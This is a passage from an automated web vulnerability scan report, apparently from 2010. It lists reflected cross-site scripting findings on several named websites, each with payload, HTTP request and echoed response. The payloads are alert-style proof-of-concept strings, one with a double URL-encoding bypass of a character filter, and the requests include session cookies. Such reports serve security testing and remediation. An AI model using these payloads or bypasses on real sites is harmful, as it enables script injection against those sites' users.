Host:   http://www.turnerlicensing.com
Path:   /turner_sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99d68'style='x:expression(alert(1))'12a287f255c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_sitemap?99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:57 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 670307848:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=913
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 79081


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Sitemap</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?it=I&id=83&99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1&fromsla=T&99d68'style='x:expression(alert(1))'12a287f255c=1&99d68%27style%3d%27x%3aexpression%28alert%281%29%29%2712a287f255c=1'>
...[SNIP]...

2.254. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_tax_information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5957e'style='x:expression(alert(1))'a5b65f5204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_tax_information?5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:55 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 670307546:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=914
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33697


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Tax Information</title>


<script language='JavaScript' type='text/javascript'>window.status='Loadi
...[SNIP]...
='http://www.turnerlicensing.com/s.nl?it=I&id=84&5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1&5957e%27style%3d%27x%3aexpression%28alert%281%29%29%27a5b65f5204=1&5957e'style='x:expression(alert(1))'a5b65f5204=1&fromsla=T'>
...[SNIP]...

2.255. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_wall_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 997ed'style='x:expression(alert(1))'137726c367f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_wall_calendars?997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:10 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2002011445:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=976
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100700


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wall Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338448&997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1&997ed'style='x:expression(alert(1))'137726c367f=1&fromsla=T&997ed%27style%3d%27x%3aexpression%28alert%281%29%29%27137726c367f=1'>
...[SNIP]...

2.256. http://medienfreunde.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e32"><script>alert(1)</script>2ff90f879e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 61e32"><script>alert(1)</script>2ff90f879e5

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:51:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-15
Content-Length: 19291

<?xml version="1.0" encoding="iso-8859-15"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="de" xmlns="http://www.w3.org/1999/x
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Corporate+Design&blogurl=61e32"><script>alert(1)</script>2ff90f879e5&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

2.257. http://player.vimeo.com/video/14121087 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/14121087

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d505'-alert(1)-'0d4c7940df5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/14121087 HTTP/1.1
Host: player.vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6d505'-alert(1)-'0d4c7940df5

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:56:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Server: 10.90.6.247
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 6182
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Tutorial: How do I ask a question?</title><script src="http://a.vimeocdn.com/js/player_combined.opt.js?e7a9f"></script><style>div{marg
...[SNIP]...
'player_type_flash') {if ( ! swfobject.hasFlashPlayerVersion('10')) {$('j').setStyle('display','block');}}player_14121087 = new MoogEmbed($('a'),'player_14121087','http://www.google.com/search?hl=en&q=6d505'-alert(1)-'0d4c7940df5',options);};window.onresize = function() {if ((document.height < 150 || document.width < 250 ) && $('e')) {$('e').addClass('o');}};window.onresize();</script>
...[SNIP]...

2.258. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d682"><script>alert(1)</script>55b3a133a2e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1d682"><script>alert(1)</script>55b3a133a2e

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:56:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=1d682"><script>alert(1)</script>55b3a133a2e" />
...[SNIP]...

2.259. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4af9b<script>alert(1)</script>c58dc0cb1ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4af9b<script>alert(1)</script>c58dc0cb1ea

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:56:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>4af9b<script>alert(1)</script>c58dc0cb1ea - Google search</h4>
...[SNIP]...

2.260. http://www.directpointe.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24bbb"><script>alert(1)</script>061fe809956 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.directpointe.com
Cookie: ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; s_cc=true; s_sq=directpointe%3D%2526pid%253DDirectPointe%25253AGoogle%252520Re-direct%2526pidt%253D1%2526oid%253DSubmit%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D49; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; __utmb=217701123.1.10.1290271597; __utmc=217701123; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting
Referer: http://www.google.com/search?hl=en&q=24bbb"><script>alert(1)</script>061fe809956

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:16:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=24bbb"><script>alert(1)</script>061fe809956" />
...[SNIP]...

2.261. http://www.directpointe.com/consultation.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /consultation.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50263"><script>alert(1)</script>1d91c58b3ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /consultation.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=50263"><script>alert(1)</script>1d91c58b3ff

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=50263"><script>alert(1)</script>1d91c58b3ff" />
...[SNIP]...

2.262. http://www.directpointe.com/landing_pages/states/california.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /landing_pages/states/california.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31be5"><script>alert(1)</script>e07c7004476 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /landing_pages/states/california.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=31be5"><script>alert(1)</script>e07c7004476

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href="../../App_T
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=31be5"><script>alert(1)</script>e07c7004476" />
...[SNIP]...

2.263. http://www.directpointe.com/regional.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /regional.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237bf"><script>alert(1)</script>340897b84e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /regional.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=237bf"><script>alert(1)</script>340897b84e7

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=237bf"><script>alert(1)</script>340897b84e7" />
...[SNIP]...

2.264. http://www.directpointe.com/solutions/additional_services.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/additional_services.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b07c"><script>alert(1)</script>721f7500c50 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/additional_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=5b07c"><script>alert(1)</script>721f7500c50

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=5b07c"><script>alert(1)</script>721f7500c50" />
...[SNIP]...

2.265. http://www.directpointe.com/solutions/cloud_computing.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/cloud_computing.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c55"><script>alert(1)</script>00fa49d82d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/cloud_computing.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=89c55"><script>alert(1)</script>00fa49d82d7

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
